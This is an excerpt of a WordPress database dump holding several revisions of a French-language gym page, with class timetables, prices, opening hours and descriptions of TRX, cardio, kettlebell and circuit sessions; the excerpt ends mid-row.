(172, 1, '2013-07-03 16:35:39', '2013-07-03 16:35:39', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n<td>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:35:39', '2013-07-03 16:35:39', '', 11, 'http://www.crosstrainingcenter.be/?p=172', 0, 'revision', '', 0),
(187, 1, '2013-07-03 17:33:38', '2013-07-03 17:33:38', '<h2>Team Training :</h2>\r\n<h4>\r\nEn semaine :</h4>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:33:38', '2013-07-03 17:33:38', '', 11, 'http://www.crosstrainingcenter.be/?p=187', 0, 'revision', '', 0),
(174, 1, '2013-07-03 16:43:44', '2013-07-03 16:43:44', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:43:44', '2013-07-03 16:43:44', '', 11, 'http://www.crosstrainingcenter.be/?p=174', 0, 'revision', '', 0),
(175, 1, '2013-07-03 16:49:05', '2013-07-03 16:49:05', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 